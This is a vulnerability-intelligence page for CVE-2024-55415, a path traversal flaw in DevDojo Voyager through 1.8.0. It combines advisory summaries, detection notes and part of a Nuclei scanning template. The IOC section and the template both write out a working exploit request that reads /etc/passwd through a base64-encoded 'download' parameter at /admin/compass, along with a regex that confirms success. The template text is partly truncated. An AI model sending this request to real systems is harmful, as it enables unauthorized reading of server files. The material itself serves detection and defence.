CVE-2024-55415
published 2025-01-30CVE-2024-55415: DevDojo Voyager through 1.8.0 is vulnerable to path traversal at the /admin/compass.
PriorityP345medium5.7CVSS 3.1
AVNACLPRLUIRSUCHINAN
EXPLOIT
EPSS
14.59%
96.2th percentile
DevDojo Voyager through 1.8.0 is vulnerable to path traversal at the /admin/compass.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tcg | voyager | 0 – 1.8.0 | — |
| thecontrolgroup | voyager | <= 1.8.0 | — |
Detection & IOCsextracted from sources · hover to see the quote
url/admin/compass?download={{base64('/etc/passwd')}}
otherregex('root:.*:0:0:', body)
- →Detect path traversal attempts against the /admin/compass endpoint by monitoring for base64-encoded path strings in the 'download' query parameter.
- →A successful exploitation returns HTTP 200 with content matching 'root:.*:0:0:' in the response body, indicating /etc/passwd was read.
- →The path traversal flaw enables attackers to manipulate file paths and delete or access arbitrary files on the server. ↗
- →Monitor for HTTP 302 redirects from /admin/compass as an intermediate indicator during exploitation attempts.
- ·Exploitation requires an authenticated Voyager admin session; the attacker must trick an authenticated user into clicking a malicious link (one-click attack vector). ↗
- ·All versions through 1.8.0 are affected and no official patch exists; detections should cover all Voyager deployments up to and including 1.8.0. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
DevDojo Voyager vulnerable to path traversal
osv·2025-01-30
CVE-2024-55415 [HIGH] DevDojo Voyager vulnerable to path traversal
DevDojo Voyager vulnerable to path traversal
DevDojo Voyager through 1.8.0 is vulnerable to path traversal at the /admin/compass.
GHSA
DevDojo Voyager vulnerable to path traversal
ghsa·2025-01-30
CVE-2024-55415 [HIGH] CWE-22 DevDojo Voyager vulnerable to path traversal
DevDojo Voyager vulnerable to path traversal
DevDojo Voyager through 1.8.0 is vulnerable to path traversal at the /admin/compass.
No detection rules found.
Nuclei
DevDojo Voyager <=1.8.0 - Arbitrary File Read
nuclei·CVSS 5.7
CVE-2024-55415 [MEDIUM] DevDojo Voyager <=1.8.0 - Arbitrary File Read
DevDojo Voyager ')"
- "status_code == 302"
condition: and
internal: true
- raw:
- |
GET /admin/compass?download={{base64('/etc/passwd')}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- regex('root:.*:0:0:', body)
- status_code == 200
condition: and
# digest: 4b0a004830460221009e4950617c15d4de703b9324b609271a1a1ec05ff401ff88797cb3e63fe87a15022100c3aeaa4fe956e5c9eae98b98c636463cccc85a8916e7a14ecd66d5a377f8bfb2:922c64590222798bb761d5b6d8e72950
2025-01-30
Published